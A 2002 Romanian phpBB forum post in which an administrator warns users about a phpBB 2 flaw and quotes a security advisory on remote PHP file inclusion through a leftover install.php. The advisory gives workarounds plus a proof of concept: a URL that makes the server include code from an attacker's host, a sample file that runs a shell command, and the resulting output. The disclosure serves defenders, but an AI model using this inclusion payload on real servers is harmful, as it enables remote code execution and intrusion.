Security bug - phpBB

Înainte de a începe să scrii un nou mesaj citeşte ultimele anunţuri şi regulamentul forumului.
Reguli forum
Aveti o problema si vreti sa primiti ajutor? Click aici ! Nu uitati si de regulamentul forumului !
Avatar utilizator
bogdan
Administrator
Administrator
Mesaje: 10888
Membru din: 18-Oct-2002, 12:14:27
Versiune: 3.0.11
MOD: Da
Server: UNIX/Linux
Nivel phpBB: Experimentat
Nivel php: Mediu
Localitate: Bucuresti
Contact:

Security bug - phpBB

Mesaj de bogdan » 12-Noi-2002, 11:45:56

In caz ca nu stiati, exista vulnerabilitati interesante in phpBB 2. Ele ii afecteaza pe cei care au fost lenesi si nu au sters install.php dupa instalare. Baietii rai vor avea ocazia sa dea o tura pe serverul vostru si cine stie, poate pica ceva. Ca tot veni vorba, ar fi bine sa nu aveti PHP-Nuke mai mic de 5.5. (preluat de la Romanian Web developers)


http://online.securityfocus.com/archive/1/277318

Cod: Selectaţi tot

JCC Security Advisory
June 16, 2002

malicious PHP source injection in phpBB

Description

phpBB is one of popular PHP bulletin board systems.
When allow_url_fopen = On and register_globals = On in php.ini, phpBB has
vulnerability because install.php contains dangerous codes.
So an attacker can include any files into server's PHP codes.

Impact

It's tested on phpBB 2.0.1. but I think all of phpBB 2 is affected.

Workaround

allow_url_fopen = off and register_globals = off.
and if complete install remove or rename install.php.
Or in install.php
-------install.php------------
define('IN_PHPBB', true);
$phpbb_root_path='./';
----------------------------
Put it
-------snip-----------------
$phpbb_root_dir='./';
----------------------------

Good idea to code that <<PHP_CODE
ini_set("register_globals", "Off");
ini_set ("allow_url_fopen", "Off");
PHP_CODE

Tested systems

phpBB 2.0.1 Debian GNU/Linux SID(x86)

Background

We checked the vulnerability with "http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE"
and
 made a sample code, functions_selects.php,

--------------------includes/functions_selects.php--------------
<? passthru("uname -a"); ?>
-----------------------------------------

and type the following URL to invoke this sample code.

TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/"

-------out put----------------------------
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
on line 182

Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/includes/sessions.php
on line 183

Warning: Cannot add header information - headers already sent by (output started at http://210.117.152.118:6969/includes/functions_selects.php:1)
in /home/morris/public_html/tmp/phpBB2/install.php
on line 346
-----------------------------------------

thx for BlackKnight at r0ar
---
http://jcc.hackerslab.org(at morris Chang)

e-mail : morris@xsdeny.net


Scrie răspuns

Înapoi la “Anunţuri”

Cine este conectat

Utilizatori ce ce navighează pe acest forum: Niciun utilizator înregistrat și 2 vizitatori